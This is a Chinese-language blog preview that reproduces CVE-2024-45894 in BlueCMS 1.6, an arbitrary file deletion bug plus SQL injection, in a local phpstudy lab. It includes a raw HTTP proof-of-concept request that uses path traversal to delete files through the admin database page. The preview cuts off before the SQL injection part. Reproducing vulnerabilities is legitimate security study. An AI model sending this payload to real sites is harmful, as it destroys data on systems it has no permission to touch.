BlueCMS 1.6漏洞复现CVE-2024-45894任意删除文件漏洞+SQL注入

文章预览

BlueCMS 1.6 漏洞复现 CVE-2024-45894 任意删除文件漏洞+SQL注入 BlueCMS 1.6 安装包下载: http: //www.xsssql.com/wp-content/uploads/2024/10/bluecms-master1.6.zip 环境搭建: 下载phpstudy，启动nignx和mysql服务 随后创建网站，在浏览器直接访问 http://127.0.0.1/install 直接下一步   使用phpstudy创建数据库，并配置数据库信息 安装完成后如图:   访问管理后台，并登录到管理后台 http://127.0.0.1/admin/ 通过删除robots.txt文件进行测试 poc如下 GET /admin/database.php?act=del _name=../../robots.txt HTTP/1.1 Host : 10.10.10.5 Upgrade-Insecure-Requests : 1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer : http://10.10.10.5/admin/index.php Accept-Encoding : gzip, deflate Accept-Langu ………………………………